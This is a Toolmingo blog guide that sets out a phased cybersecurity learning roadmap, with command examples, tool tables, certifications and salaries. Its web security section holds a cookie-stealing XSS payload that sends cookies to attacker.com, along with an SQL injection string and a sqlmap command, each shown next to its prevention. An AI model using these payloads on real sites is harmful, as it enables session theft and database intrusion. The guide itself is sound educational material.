Toolmingo
Guides18 min read

Cybersecurity Roadmap 2025 (Step-by-Step Guide)

The complete cybersecurity roadmap for 2025 — networking, Linux, ethical hacking, cryptography, cloud security, and certifications. Know exactly what to learn and in what order.

Cybersecurity is one of the fastest-growing fields in tech — with millions of unfilled roles and salaries rivalling software engineering. But "cybersecurity" covers a huge spectrum: penetration testing, cloud security, incident response, cryptography, governance, and more. This roadmap shows you exactly what to learn, in what order, and which certifications actually matter, so you can move from zero to job-ready in 12–18 months.

At a glance

Phase Topics Time estimate
1 Foundations: networking and operating systems 6–8 weeks
2 Linux and command-line proficiency 4–6 weeks
3 Programming and scripting basics 4–6 weeks
4 Core security concepts and cryptography 4–6 weeks
5 Web security and OWASP Top 10 3–4 weeks
6 Ethical hacking and penetration testing 6–8 weeks
7 Defensive security: SIEM, SOC, and blue team 4–6 weeks
8 Cloud security (AWS/Azure/GCP) 4–6 weeks
9 Malware analysis and digital forensics 4–6 weeks
10 Compliance, governance, and risk 2–3 weeks
11 Certifications and portfolio 4–8 weeks
Total to first role ~12–18 months

Phase 1 — Networking and operating system foundations

Security professionals spend most of their time on networks. You cannot protect what you do not understand.

Core networking skills

Topic What to know
OSI model 7 layers — what happens at each, common attack surfaces per layer
TCP/IP 3-way handshake, TCP vs UDP, IP addressing, CIDR notation
DNS Record types (A/AAAA/MX/TXT/CNAME/NS/PTR), DNS poisoning
HTTP/HTTPS Methods, status codes, headers, TLS 1.3 handshake
Common protocols FTP, SSH, SMTP, IMAP, POP3, SNMP, LDAP, Kerberos port numbers
Firewalls Stateless vs stateful, packet filtering, WAF
NAT and VPN NAT types, IPsec vs OpenVPN vs WireGuard

Practical tools

# Network reconnaissance
nmap -sV -sC -O 192.168.1.0/24   # version + script scan
nmap -p- --min-rate 5000 <IP>     # all ports fast

# Traffic analysis
tcpdump -i eth0 port 80 -w capture.pcap
wireshark                          # GUI packet inspector

# DNS enumeration
dig +any example.com
nslookup -type=TXT example.com

# Connectivity testing
ping -c 4 8.8.8.8
traceroute 8.8.8.8
curl -I https://example.com

Phase 2 — Linux proficiency

Most servers run Linux. Most security tools run on Linux. You must be comfortable on the command line.

Essential Linux for security

# File permissions (critical for privilege escalation)
ls -la /etc/shadow              # check who can read sensitive files
find / -perm -4000 2>/dev/null  # find SUID binaries (escalation targets)
find / -writable -type f 2>/dev/null | grep -v proc

# Process and network inspection
ps aux | grep <process>
ss -tlnp                        # listening ports + PIDs
netstat -antp
lsof -i :80                     # what's on port 80

# Log analysis
tail -f /var/log/auth.log       # authentication events
journalctl -u ssh --since "1 hour ago"
grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn

# User and privilege management
id                              # current user + groups
sudo -l                         # what can I run as sudo?
cat /etc/passwd | grep -v nologin
getent group sudo

Linux hardening checklist

Area Hardening action
SSH Disable root login, use key auth, change default port
Firewall ufw enable, allow only needed ports
Updates unattended-upgrades enabled
Users Remove unused accounts, enforce strong passwords
SUID Audit and remove unnecessary SUID binaries
Logging Enable auditd, forward logs to SIEM
Cron Review /etc/cron* for unexpected entries

Phase 3 — Programming and scripting

You don't need to be a software developer, but scripting is essential for automation, tool development, and understanding exploits.

Python for security

# Port scanner
import socket

def scan_port(host, port):
    try:
        with socket.create_connection((host, port), timeout=1):
            return True
    except (socket.timeout, ConnectionRefusedError):
        return False

open_ports = [p for p in range(1, 1025) if scan_port("192.168.1.1", p)]
print(f"Open ports: {open_ports}")

# Hash a password (never store plain text)
import hashlib
import secrets

salt = secrets.token_hex(16)
hashed = hashlib.pbkdf2_hmac("sha256", b"password", salt.encode(), 100_000)
print(f"Salt: {salt}, Hash: {hashed.hex()}")

# Parse HTTP logs for suspicious IPs
from collections import Counter
with open("/var/log/nginx/access.log") as f:
    ips = [line.split()[0] for line in f]
top_ips = Counter(ips).most_common(10)
print(top_ips)

Bash scripting for automation

#!/usr/bin/env bash
# Quick recon script
TARGET=$1
echo "[*] Running recon on $TARGET"
echo "[*] Pinging..."
ping -c 1 "$TARGET" &>/dev/null && echo "Host is up" || echo "Host is down"
echo "[*] Top 100 ports..."
nmap -F "$TARGET" -oN "recon-$TARGET.txt"
echo "[*] Done. Results saved."

Languages worth knowing

Language Use case in security
Python Scripting, exploit development, automation, forensics
Bash Linux automation, log parsing, quick recon scripts
PowerShell Windows administration and incident response
JavaScript Understanding XSS, prototype pollution, Node.js vulns
SQL Exploiting and defending against SQL injection
Go Building fast, portable security tools (many modern tools use Go)

Phase 4 — Core security concepts and cryptography

The CIA triad + beyond

Concept Definition Attack example
Confidentiality Data only accessible to authorised parties Eavesdropping, data breach
Integrity Data not altered without detection Man-in-the-middle, file tampering
Availability Systems accessible when needed DDoS, ransomware
Authentication Verifying identity Credential stuffing, phishing
Authorisation Verifying what you can do IDOR, privilege escalation
Non-repudiation Proof that an action occurred Log tampering

Cryptography essentials

Concept Detail
Symmetric encryption Same key for encrypt + decrypt (AES-256, ChaCha20) — fast
Asymmetric encryption Public + private key pair (RSA-2048, ECDSA) — slower, used for key exchange
Hashing One-way (SHA-256, bcrypt, Argon2) — passwords, integrity checks
Digital signatures Hash + asymmetric sign → authenticity + integrity
PKI / certificates X.509 cert chain from root CA → intermediate → leaf
TLS 1.3 ECDHE key exchange, AEAD cipher (AES-GCM), 0-RTT option

Common attacks on cryptography

Attack Target Defence
Brute force Weak passwords / short keys Strong passwords, Argon2/bcrypt, 256-bit keys
Rainbow tables Unsalted hashes Always salt passwords
MITM TLS downgrade / cert spoofing HSTS, certificate pinning, HPKP
Padding oracle CBC-mode encryption Use AEAD modes (AES-GCM)
Birthday attack Short hashes SHA-256 minimum, avoid MD5/SHA-1
Side-channel Timing leaks Constant-time comparison

Phase 5 — Web security and OWASP Top 10

Web applications are the most common attack surface. Learn every item on the OWASP Top 10 inside out.

OWASP Top 10 (2021)

Rank Vulnerability Quick description
A01 Broken Access Control IDOR, privilege escalation, CORS misconfiguration
A02 Cryptographic Failures Weak ciphers, unencrypted PII, MD5 passwords
A03 Injection SQL injection, command injection, LDAP injection
A04 Insecure Design Missing threat modelling, no security controls in design
A05 Security Misconfiguration Default credentials, exposed error pages, open S3 buckets
A06 Vulnerable Components Outdated libraries with known CVEs
A07 Auth and Session Failures Weak passwords, missing MFA, insecure session tokens
A08 Software and Data Integrity Unsigned updates, CI/CD pipeline attacks, deserialization
A09 Logging and Monitoring Failures No alerting on brute force, undetected breaches
A10 SSRF Forging requests to internal resources (cloud metadata API)

SQL injection — detect and prevent

-- Vulnerable (NEVER do this)
query = "SELECT * FROM users WHERE username='" + username + "'"

-- Injected input: ' OR '1'='1
-- Becomes: SELECT * FROM users WHERE username='' OR '1'='1'
-- Returns all users!
# Safe: parameterised queries
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))

# Test for SQLi with sqlmap:
# sqlmap -u "https://target.com/login" --data "user=test&pass=test" --dbs

XSS — detect and prevent

// Reflected XSS: input echoed in response without sanitisation
// Payload: <script>document.location='https://attacker.com/?c='+document.cookie</script>

// Prevention
const safe = DOMPurify.sanitize(userInput);   // client-side
// Server: encode output with html-entities, set Content-Security-Policy header
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

Phase 6 — Ethical hacking and penetration testing

This is the skill most people think of when they hear "cybersecurity." Penetration testing has a formal methodology.

Pentest methodology

Phase Activities
1. Reconnaissance Passive (OSINT, Shodan, LinkedIn) + Active (nmap, DNS enum)
2. Scanning and enumeration Port scan, service fingerprint, vuln scan (Nessus/OpenVAS)
3. Exploitation CVE exploits, Metasploit, manual exploitation
4. Post-exploitation Privilege escalation, lateral movement, persistence
5. Reporting Executive summary + technical findings + remediation

Essential tools

Tool Purpose
Nmap Network discovery and port scanning
Burp Suite Web app intercepting proxy and scanner
Metasploit Exploit framework and payload generation
Nikto Web server misconfiguration scanner
Gobuster / ffuf Directory and file brute-forcing
Hydra Credential brute-forcing (SSH, FTP, web forms)
sqlmap Automated SQL injection detection and exploitation
John / Hashcat Password hash cracking
Wireshark / tcpdump Packet capture and analysis
Enum4linux Windows/Samba enumeration
LinPEAS / WinPEAS Automated privilege escalation enumeration

Practice platforms (free)

Platform Focus
TryHackMe Guided beginner-to-intermediate labs
Hack The Box Real-world-style machines, competitive
PicoCTF CTF competitions, great for beginners
OWASP WebGoat Intentionally vulnerable web app
DVWA (Damn Vulnerable Web App) Self-hosted web app vulns
VulnHub Downloadable vulnerable VMs

Phase 7 — Defensive security: SIEM, SOC, and blue team

Offensive is exciting, but defensive roles (SOC analyst, incident responder) are where most entry-level jobs are.

Security Operations Centre (SOC)

SOC tier Role
Tier 1 Alert triage, false positive filtering, initial investigation
Tier 2 Deep-dive incident analysis, threat hunting
Tier 3 Advanced threat hunting, tool development, red team correlation

SIEM fundamentals

A SIEM (Security Information and Event Management) collects logs from every source and correlates them into alerts.

# Example Sigma detection rule (vendor-agnostic SIEM rule format)
title: Suspicious PowerShell Encoded Command
status: test
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine|contains:
      - '-EncodedCommand'
      - '-enc '
      - '-e '
    Image|endswith: '\powershell.exe'
  condition: selection
level: medium
tags:
  - attack.execution
  - attack.t1059.001

Key log sources to monitor

Source What to look for
Windows Event Logs 4624 (logon), 4625 (failed logon), 4688 (process creation), 4698 (scheduled task)
Linux auth.log Failed SSH, sudo usage, new user creation
Firewall logs Blocked connections, port scans, unusual outbound
DNS logs Long domain names (data exfil), newly registered domains, DGA patterns
Web server logs 403/404 spikes (scanning), large POSTs (upload), unusual User-Agents
EDR/AV alerts Malware detections, suspicious process trees

Incident response (NIST framework)

Phase Actions
Preparation Playbooks, tools, team roles, backups
Detection and analysis Identify IoCs, scope the incident
Containment Isolate affected systems, block attacker IPs
Eradication Remove malware, patch vulnerability
Recovery Restore systems from clean backups, verify integrity
Post-incident Root cause analysis, lessons learned, report

Phase 8 — Cloud security

Cloud misconfigurations are the #1 cause of breaches. Every security professional needs cloud literacy.

Shared responsibility model

Layer AWS manages Customer manages
IaaS (EC2) Physical, hypervisor, network OS, app, data, IAM
PaaS (RDS) Physical, OS, DB engine Data, IAM, encryption
SaaS (Workmail) Everything below app layer Data, user access

Top cloud misconfigurations

Misconfiguration Impact
Public S3 bucket Data exposure
Overpermissive IAM role Privilege escalation
Security group 0.0.0.0/0 on SSH Brute force exposure
Unencrypted EBS volume Data breach if snapshot leaked
Metadata service exposed SSRF → credential theft (IMDSv1)
MFA not enforced on root account Account takeover
CloudTrail disabled No audit trail

AWS security tools

# Check for exposed resources
aws s3api list-buckets --query 'Buckets[].Name'
aws s3api get-bucket-acl --bucket <name>

# IAM audit
aws iam generate-credential-report
aws iam get-credential-report --query 'Content' | base64 -d

# CloudTrail: check for suspicious API calls
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time "2025-01-01T00:00:00Z"

# Security Hub findings
aws securityhub get-findings --filters '{"RecordState":[{"Value":"ACTIVE","Comparison":"EQUALS"}]}'

Phase 9 — Malware analysis and digital forensics

Types of malware

Type Behaviour Defence
Virus Attaches to executable files Signature-based AV
Worm Self-propagates over network Network segmentation
Trojan Disguised as legitimate software App whitelisting, EDR
Ransomware Encrypts files, demands payment Offline backups, EDR
Rootkit Hides itself at OS/kernel level Secure boot, EDR
Spyware Keylogging, screen capture EDR, monitoring
Botnet / C2 Remote control via C2 server Network monitoring, DNS filtering
Fileless Runs in memory only Behavioural detection, AMSI

Static malware analysis

# File identification
file malware.bin
strings malware.bin | grep -E "(http|ftp|cmd|powershell|base64)" | head -30

# Hash for threat intel lookup (VirusTotal)
sha256sum malware.bin
md5sum malware.bin

# PE file analysis (Windows executables)
exiftool malware.exe              # metadata
objdump -d malware.exe | head -50 # disassembly
# Use PE Studio or CFF Explorer for GUI analysis

Dynamic analysis (sandbox)

Tool Use
Any.run Interactive online sandbox
Cuckoo Sandbox Self-hosted automated analysis
REMnux Linux distro for malware analysis
Flare VM Windows VM for reverse engineering
Ghidra NSA's free reverse engineering framework
x64dbg Windows debugger for dynamic analysis

Digital forensics

# Disk imaging (never work on original evidence)
dd if=/dev/sda of=/mnt/external/disk.img bs=4M status=progress
dcfldd if=/dev/sda hash=sha256 hashlog=hash.txt of=disk.img

# Memory acquisition
sudo avml /mnt/external/memory.lime      # Linux
# For Windows: WinPmem, Magnet RAM Capture

# Volatility 3 — memory analysis
vol -f memory.lime linux.pslist          # running processes
vol -f memory.lime linux.netstat         # network connections
vol -f memory.lime linux.bash            # bash history in memory

Phase 10 — Compliance, governance, and risk

Many security jobs are in GRC (Governance, Risk, and Compliance) — less technical but high-paying and abundant.

Key frameworks and standards

Framework Scope Who uses it
NIST CSF 2.0 Cybersecurity risk management US government, enterprises
ISO/IEC 27001 Information security management Global enterprises, certification
SOC 2 Type II Service organisation controls (Trust Service Criteria) SaaS companies
PCI-DSS v4 Payment card data security Any org processing card payments
GDPR EU personal data protection Any org handling EU resident data
HIPAA US healthcare data protection US healthcare organisations
CIS Controls Prioritised security actions (18 controls) Baseline for any organisation
MITRE ATT&CK Adversary tactics and techniques Threat intelligence, SOC detection

Risk management basics

Risk = Likelihood × Impact

Risk treatments:
  Avoid    — stop the risky activity
  Mitigate — implement controls to reduce likelihood/impact
  Transfer — insurance, third-party contracts
  Accept   — document and accept residual risk

Full technology map

FOUNDATIONS
├── Networking (TCP/IP, DNS, HTTP, TLS)
├── Operating systems (Linux + Windows)
├── Programming (Python, Bash, PowerShell)
└── Cryptography (AES, RSA, hashing, PKI)

OFFENSIVE (Red Team)
├── Reconnaissance (OSINT, Shodan, nmap)
├── Scanning (Nessus, Nikto, Burp Suite)
├── Exploitation (Metasploit, manual CVEs)
├── Post-exploitation (LinPEAS, privilege escalation)
└── Reporting (findings, remediation, CVSS scores)

DEFENSIVE (Blue Team)
├── SIEM (Splunk, Microsoft Sentinel, Elastic)
├── EDR (CrowdStrike, SentinelOne, Defender)
├── Threat hunting (hypothesis-driven detection)
├── Incident response (NIST 6 phases)
└── Digital forensics (Volatility, Autopsy)

WEB SECURITY
├── OWASP Top 10 (SQLi, XSS, SSRF, etc.)
├── Burp Suite (intercept, scanner, intruder)
├── API security (JWT, OAuth, rate limiting)
└── Source code review (SAST tools)

CLOUD SECURITY
├── AWS (IAM, Security Hub, GuardDuty, CloudTrail)
├── Azure (Defender for Cloud, Entra ID, Sentinel)
├── GCP (Security Command Center, VPC Service Controls)
└── Kubernetes security (RBAC, network policies, OPA)

GRC
├── Frameworks (NIST, ISO 27001, SOC 2, PCI-DSS)
├── Risk management (assessment, treatment)
├── Audit and compliance
└── Policy and procedure writing

Realistic 18-month timeline

Month Focus Milestone
1–2 Networking + Linux basics Pass CompTIA Network+ or Linux Essentials
3–4 Python scripting + core security concepts Write 3 security automation scripts
5–6 Web security + Burp Suite Complete TryHackMe Web Fundamentals path
7–8 Ethical hacking + Metasploit Pass CompTIA Security+
9–10 CTF practice + Hack The Box Solve 10 HTB machines
11–12 Blue team: SIEM + incident response Complete TryHackMe SOC Level 1 path
13–14 Cloud security (AWS) Pass AWS Security Specialty or CCP
15–16 Malware analysis or GRC specialisation Pick a track
17–18 Portfolio projects + job applications 3 write-ups + GitHub CVE research

Certifications (prioritised)

Certification Level Cost Why it matters
CompTIA Security+ Entry ~$400 Baseline industry requirement, DoD 8570 compliant
CompTIA Network+ Entry ~$370 Networking prerequisite (do before Security+)
eJPT (eLearnSecurity) Entry $200 Practical pentesting beginner cert
CompTIA CySA+ Mid ~$400 Blue team / SOC analyst roles
OSCP (OffSec) Mid-senior $1,499 Gold standard for penetration testing
CEH (EC-Council) Mid ~$1,000 HR-friendly but less respected by practitioners
CISSP Senior ~$700 Management + architecture, needs 5 years experience
AWS Security Specialty Mid $300 Cloud security specialist
CISM / CISA Senior ~$600 GRC, audit, management roles
GPEN / GWAPT (GIAC) Mid ~$999 Highly respected advanced pentesting

Cybersecurity roles and salary (2025)

Role Focus Avg salary (US)
SOC Analyst (L1) Alert triage, monitoring $55k–$75k
SOC Analyst (L2/L3) Threat hunting, IR $75k–$110k
Penetration Tester Offensive testing, reporting $90k–$140k
Application Security Engineer Secure SDLC, SAST/DAST $110k–$160k
Cloud Security Engineer AWS/Azure/GCP security $120k–$180k
Security Engineer Architecture, tooling, automation $110k–$160k
Malware Analyst / Reverse Engineer Binary analysis, threat intel $90k–$130k
GRC Analyst Compliance, risk, policy $70k–$110k
CISO Cybersecurity strategy and leadership $180k–$350k+

Common mistakes to avoid

Mistake Why it hurts What to do instead
Skipping networking fundamentals You won't understand attacks or defences Do Network+ before Security+
Only doing CTFs, not learning concepts Shallow tool knowledge Study the "why" behind each technique
Trying to learn everything at once Burnout, no depth Pick a track (red/blue/cloud) after foundations
Ignoring scripting Manual work is slow; detection gaps widen Python and Bash are non-negotiable
Illegal practice on live systems Criminal charges Stick to authorised labs and CTF platforms
Collecting certs without practical skills Won't pass technical interviews Labs first, certs validate existing skills
Ignoring the blue team Offensive-only thinking limits you Understand both attack and defence
Not documenting practice Can't show recruiters Write up every machine you root

Cybersecurity vs related fields

Field Focus Overlap
Cybersecurity Protect systems, detect threats, respond to incidents
DevSecOps Shift security left into CI/CD pipelines Cloud, automation
Software engineering Build secure-by-design applications OWASP, secure coding
Data engineering Secure data pipelines, encryption at rest/transit Compliance, GDPR
IT operations / SysAdmin System management (sometimes same team) Linux, networking
Threat intelligence Research threat actors, malware campaigns Malware analysis, OSINT

Frequently asked questions

Do I need a degree to get into cybersecurity? No. Many practitioners are self-taught or come from unrelated fields. Certifications (especially Security+ and OSCP), a strong lab portfolio, and CTF write-ups can outweigh a degree for most roles — though some government and defence positions formally require it.

Red team or blue team first? Start with blue team. Understanding how attacks are detected and how systems are defended gives you context that makes you a better attacker later. SOC analyst roles are also more abundant for entry-level candidates. Many professionals eventually do both (purple team).

What's the fastest path to a job? CompTIA Security+ + TryHackMe SOC path + 3 HTB write-ups gets many people their first SOC Tier 1 role within 6–9 months. Specialise into pentesting or cloud security after your first 12–18 months of paid experience.

Is ethical hacking (pentesting) legal? Only with explicit written authorisation from the system owner. Never test systems you don't own or have no written permission to test — this is illegal in almost every jurisdiction regardless of intent. Use TryHackMe, HTB, or your own lab.

OSCP or CEH? OSCP every time. CEH is a multiple-choice exam with less practitioner respect. OSCP is a 24-hour practical exam where you exploit real machines — it carries significant weight with hiring managers. The CEH is more of an HR check-box at some organisations.

Python or Go for security tooling? Python first. The security ecosystem (Scapy, Impacket, Volatility, most PoC exploits) is built in Python. Go is growing fast for building portable, high-performance security tools (many modern C2 frameworks are Go-based), but Python gets you further faster as a beginner.

Keep reading

All Toolmingotools are free & run in your browser

No sign-up, no upload, no watermark. Your files never leave your device.

Browse all tools